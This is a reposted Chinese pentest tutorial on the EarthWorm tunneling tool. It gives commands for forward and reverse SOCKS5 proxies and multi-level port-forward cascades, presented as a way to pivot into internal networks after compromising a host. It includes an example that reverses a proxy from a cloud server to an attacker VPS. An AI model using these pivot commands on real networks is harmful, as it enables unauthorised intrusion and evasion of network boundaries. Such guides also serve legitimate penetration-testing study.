ICode9

精准搜索请尝试: 精确搜索
首页 > 互联网> 文章详细

内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区

2018-11-02 10:09:54  阅读:629  来源: 互联网

标签:



0x00 前言
当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了?
不来一次内网漫游,渗透是不完整的,哈哈。



本文给大家推荐一款内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。



它强在哪些方面呢?
1.可穿透复杂的内网环境。(这么说吧:我本地连着路由器开一个虚拟机,可以直接反弹到公网的云服务器上。)
2.以支持多平台间的转接通讯,Linux、Windows、MacOS、Arm-Linux均支持。
支持平台列表:(可跨平台反弹)
ew_for_Win.exe 适用各种Windows系统(X86指令集、X64指令集) Windows7、Windows XP
ew_for_Linux32 各常见Linux发行版 (X86 指令集 CPU) Ubuntu(X86)/BT5(X86)
ew_for_linux64 各常见Linux发行版 (X64 指令集 CPU) Ubuntu(X64)/Kali(X64)
ew_for_MacOSX64 MacOS系统发行版 (X64 指令集) 苹果PC电脑,苹果server
ew_for_Arm32 常见Arm-Linux系统 HTC New One(Arm-Android)/小米路由器(R1D)
ew_mipsel 常见Mips-Linux系统 (Mipsel指令集 CPU) 萤石硬盘录像机、小米mini路由器(R1CM)

3.png (44.43 KB, 下载次数: 14)

下载附件 保存到相册

2018-3-21 13:19 上传


0x01 使用方法

以下所有样例,如无特殊说明代理端口均为1080,服务均为SOCKSv5代理服务.
该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。
1.正向SOCKS v5服务器

[Shell] 纯文本查看 复制代码

$ ./ew -s ssocksd -l 1080


2. 反弹 SOCKS v5 服务器
这个操作具体分两步:
a) 先在一台具有公网 ip 的主机A上运行以下命令:

[Shell] 纯文本查看 复制代码

$ ./ew -s rcsocks -l 1080 -e 8888


b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口

[Shell] 纯文本查看 复制代码

$ ./ew -s rssocks -d 1.1.1.1 -e 8888


成功。
3. 多级级联
工具中自带的三条端口转发指令,它们的参数格式分别为:

[Shell] 纯文本查看 复制代码

1

2

3

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999

$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

通过这些端口转发指令可以将处于网络深层的基于TCP的服务转发至根前,比如 SOCKS v5。
首先提供两个“二级级联”本地SOCKS测试样例:
a) lcx_tran 的用法

[Shell] 纯文本查看 复制代码

1

2

$ ./ew -s ssocksd -l 9999

$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

b) lcx_listen、lcx_slave 的用法

[Shell] 纯文本查看 复制代码

1

2

3

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./ew -s ssocksd -l 9999

$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999


再提供一个“三级级联”的本地SOCKS测试用例以供参考

[Shell] 纯文本查看 复制代码

1

2

3

4

$ ./ew -s rcsocks -l 1080 -e 8888

$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

$ ./ew -s lcx_listen -l 9999 -e 7777

$ ./ew -s rssocks -d 127.0.0.1 -e 7777


数据流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

0x02 实战测试(分为本地测试和公网IP测试)
一般最常用的就是上面的第二条:反弹 SOCKS v5 服务器。
使用实例1:
目标机器:

[Shell] 纯文本查看 复制代码

ew.exe -s rssocks -d 2.2.2.2 -e 888


(2.2.2.2为想要反弹到的机器)
攻击机器:

[Shell] 纯文本查看 复制代码

ew.exe -s rcsocks -l 1008 -e 888


(监听888端口,转发到1008端口)
测试环境:
在这里我直接用我的本机Win10作为目标机器,将虚拟机Win7作为攻击机器。
本机Win10 ip:192.168.62.1
Win7 ip:192.168.62.128





首先攻击机器win7运行命令:

[Shell] 纯文本查看 复制代码

ew_for_Win.exe -s rcsocks -l 1008 -e 888


接收888端口的数据并转发到1008端口。



此时正在监听。
目标机器Win10运行命令:

[Shell] 纯文本查看 复制代码

ew_for_Win.exe -s rssocks -d 192.168.62.128 -e 888




此时攻击机器会弹出连接成功的提示:




好了,到此Win10的SOCKS5代理就反弹到Win7攻击机上了。
只需要一个Socks5连接工具就可以连接到本地1008端口来代理访问了。
推荐工具SocksCap64。




在代理处配置127.0.0.1:1008
代理已连接。
使用实例2:
攻击者洛杉矶 Linux VPS :45.78.*.*
目标阿里云服务器 Win2008:47.93.*.*
攻击者Linux监听:

[Shell] 纯文本查看 复制代码

[root@centos6 ~]# ./ew_for_Linux32 -s rcsocks -l 1008 -e 888




目标阿里云服务器反弹:

[Shell] 纯文本查看 复制代码

ew_for_Win.exe -s rssocks -d 45.78.*.* -e 888




攻击机器监听出现:rssocks cmd_socket OK!
表示反弹成功。
0x03 工具下载
分别是EarthWorm和SocksCap64。

.keke_tieng{ border:1px solid #E3E3E3; background:#efefef; padding:5px;/* border-radius:10px; -moz-border-radius:10px; -webkit-border-radius:10px;*/ margin:15px auto; } .keke_tieng .tienegbox{ background:#fff; padding:15px;/*border-radius:10px; -moz-border-radius:10px; -webkit-border-radius:10px;*/} .keke_tieng .ngleft,.keke_tieng .ngright{ width:49%;} .keke_tieng .ngleft{ float:left;} .keke_tieng .ngright{ float:right} .keke_tieng .hd{ width:100%; float:left; margin:0px 0px 10px 0px;height:28px;overflow:hidden;} .keke_tieng .hd a{line-height:28px; height:28px;width:100%;margin-left:10px; font-size:16px;font-family:"Microsoft Yahei"; font-weight:bold} .keke_tieng .hd h2{color:#FFF;width:62px;margin:0px;text-align:center;line-height:28px; height:28px; float:left} .keke_tieng .ngleft .hd h2{background:url(source/plugin/keke_tieng/template/images/tbga.png) no-repeat right;} .keke_tieng .ngright .hd h2{background:url(source/plugin/keke_tieng/template/images/tbgb.png) no-repeat right;} .keke_tieng li{ width:100%; float:left; height:29px; overflow:hidden; line-height:29px; color:#fd6666;} .keke_tieng li span{ float:right; width:50px; font-size:14px; color:#999; line-height:29px; text-align:right; padding-right:5px;} .keke_tieng li a{height:29px; font-size:14px; font-family:"Microsoft Yahei"; line-height:29px;color:#333333} .keke_tieng li a.bk{margin-right:3px; color:#FF9966} .clear{ clear:both; } .exx_zan { width: 75px; margin: 40px auto 0; height: 75px; position: relative; clear: both; }.exx_zan a.zan:link, .exx_zan a.zan:visited { color: #fff; text-decoration: none; }.exx_zan a.zan { width: 75px; height: 75px; background: url(https://bbs.ichunqiu.com/source/plugin/exx_like/template/images/dianzan.png) no-repeat 0 0; display: block; }.exx_zan a.zan:hover{ background: url(https://bbs.ichunqiu.com/source/plugin/exx_like/template/images/dianzan.png) no-repeat -95px 0; } .exx_zan a.zan em { width: 75px; text-align: center; padding: 48px 0 0; display: block; color: #fff; font-size:12px; line-height:20px; } .pcb{margin-right:0}

标签:
来源: https://bbs.ichunqiu.com/thread-36219-1-2.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有